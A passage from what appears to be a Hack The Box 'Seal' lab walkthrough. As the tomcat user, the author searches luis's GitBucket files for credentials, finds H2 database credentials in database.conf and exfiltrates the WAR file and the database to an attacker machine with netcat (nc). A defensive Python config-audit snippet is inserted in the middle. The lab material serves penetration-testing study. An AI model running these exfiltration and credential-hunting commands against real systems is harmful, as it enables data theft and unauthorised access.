GitBucket
/bin/sh -c java -jar /home/luis/gitbucket.war
According to the process enumeration that I made earlier, the GitBucket instance is running with the privileges of the luis user
tomcat@seal:/home/luis$ nc 10.10.14.7 2222 < gitbucket.war
┌──(kali㉿kali)-[~/archive/htb/labs/seal]
└─$ nnc 2222 > gitbucket.war
listening on [any] 2222 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.250] 56024
I moved the WAR file to Kali for in-depth analysis
┌──(kali㉿kali)-[~/…/htb/labs/seal/gitbucket]
└─$ jar -xvf gitbucket.war
picked up _java_options: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
inflated: META-INF/MANIFEST.MF
[...REDACTED...]
Then I extracted the content
┌──(kali㉿kali)-[~/…/htb/labs/seal/gitbucket]
└─$ ls
assets gitbucket.war javax JettyLauncher.class META-INF org WEB-INF
assets: This directory typically contains static files such as images, stylesheets, and JavaScript files that are served by the web application.
javax: This directory contains Java EE API classes and interfaces that the web application may use.
JettyLauncher.class: This is a compiled Java class file that may be used to start the Jetty web server.
META-INF: This directory typically contains metadata files for the web application, such as the MANIFEST.MF file.
org: This directory typically contains Java class files for the web application, organized according to the package structure of the application.
WEB-INF: This directory contains configuration files and classes that are specific to the web application. Specifically, the classes subdirectory contains compiled Java classes for the application, and the lib subdirectory contains third-party JAR files that the application depends on.
I went through pretty much all of them without finding anything
┌──(kali㉿kali)-[~/…/htb/labs/seal/gitbucket]
└─$ javap -c -p -s -v JettyLauncher.class | egrep -i "*passw*|*sql*|*user*|crede*"
grep: warning: * at start of expression
grep: warning: * at start of expression
grep: warning: * at start of expression
picked up _java_options: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
#101 = String #245 // user.home
#245 = Utf8 user.home
56: ldc #101 // String user.home
I decompiled the Java class file to see if it contained any credentials, but no luck
So the WAR file itself had not much going on
But I found the .gitbucket directory at the home directory of the luis user as well
.gitbucket
tomcat@seal:/home/luis$ ll .gitbucket
total 120K
4.0K drwxrwxr-x 3 luis luis 4.0K Apr 11 14:29 plugins
80K -rw-rw-r-- 1 luis luis 80K Apr 11 14:29 data.mv.db
4.0K drwxrwxr-x 3 luis luis 4.0K Apr 11 14:29 tmp
4.0K drwxrwxr-x 6 luis luis 4.0K Apr 11 14:29 .
4.0K drwxr-xr-x 9 luis luis 4.0K May 7 2021 ..
8.0K -rw-rw-r-- 1 luis luis 5.6K May 6 2021 activity.log
4.0K -rw-rw-r-- 1 luis luis 673 May 5 2021 gitbucket.conf
4.0K drwxrwxr-x 3 luis luis 4.0K May 5 2021 repositories
4.0K drwxrwxr-x 2 luis luis 4.0K May 5 2021 gist
4.0K -rw-rw-r-- 1 luis luis 205 May 5 2021 database.conf
I can see that the directory contains the DB file as well as the configuration file for it
tomcat@seal:/home/luis/.gitbucket$ cat database.conf
db {
url = "jdbc:h2:${DatabaseHome};MVCC=true"
user = "sa"
password = "sa"
# connectionTimeout = 30000
# idleTimeout = 600000
# maxLifetime = 1800000
# minimumIdle = 10
# maximumPoolSize = 10
The DB configuration file contains the DB credential: sa:sa
The jdbc:h2: prefix specifies the driver and protocol for connecting to an H2 database, followed by the location of the database files, which in this case is ${DatabaseHome}. GitBucket substitutes its own home directory for ${DatabaseHome} (here /home/luis/.gitbucket), which is why data.mv.db sits right beside this configuration file.
The MVCC=true option enables multi-version concurrency control.
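As an added audit example (my own code, not part of this writeup or of GitBucket), a Python check that parses a database.conf of the layout shown above and flags the three weaknesses visible here: stock H2 credentials, an embedded file database whose data is exposed to anyone who can read data.mv.db, and a config file readable beyond its owner. The sample config is constructed; DEFAULT_H2_CREDS and the function names are assumptions of this example.

```python
import re
import stat
from pathlib import Path

# Matches the key = "value" lines inside the db { ... } block of GitBucket's database.conf.
_KV = re.compile(r'^\s*(url|user|password)\s*=\s*"?([^"\n]*?)"?\s*$', re.M)

# Constructed sample with the same layout as the file in the writeup (not taken from a live host).
SAMPLE_CONF = '''db {
  url = "jdbc:h2:${DatabaseHome};MVCC=true"
  user = "sa"
  password = "sa"
  # connectionTimeout = 30000
}
'''

# H2's stock admin account; an empty password is the other shipped default (assumed list).
DEFAULT_H2_CREDS = {("sa", "sa"), ("sa", "")}


def parse_db_conf(text):
    """Return {url, user, password} from a database.conf body; commented lines are ignored."""
    body = "\n".join(l for l in text.splitlines() if not l.lstrip().startswith("#"))
    return {key: value for key, value in _KV.findall(body)}


def audit_db_conf(text, mode=None):
    """Findings for one database.conf: default creds, embedded H2 file DB, loose mode bits."""
    cfg = parse_db_conf(text)
    findings = []
    if (cfg.get("user"), cfg.get("password")) in DEFAULT_H2_CREDS:
        findings.append("default H2 credentials (sa) in use")
    # An H2 URL without tcp:// is an embedded file database: file read access equals DB access.
    if cfg.get("url", "").startswith("jdbc:h2:") and "tcp://" not in cfg["url"]:
        findings.append("embedded H2 file database: anyone who can read data.mv.db has the data")
    if mode is not None and mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("database.conf readable by group/others (mode %o)" % (mode & 0o777))
    return findings


def audit_path(conf_path):
    """Audit a real database.conf on disk, using its actual permission bits."""
    p = Path(conf_path)
    return audit_db_conf(p.read_text(), p.stat().st_mode)
```

Run audit_path("/path/to/.gitbucket/database.conf") on a host you administer; an empty list means none of the three conditions applies.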
tomcat@seal:/home/luis/.gitbucket$ nc 10.10.14.7 2222 < data.mv.db
┌──(kali㉿kali)-[~/…/labs/seal/gitbucket/.gitbucket]
└─$ nnc 2222 > data.mv.db
listening on [any] 2222 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.250] 56028
While I was struggling to open this H2 database with a web-based tool, because I didn't want to download and install a third-party tool, I found an attack vector for lateral movement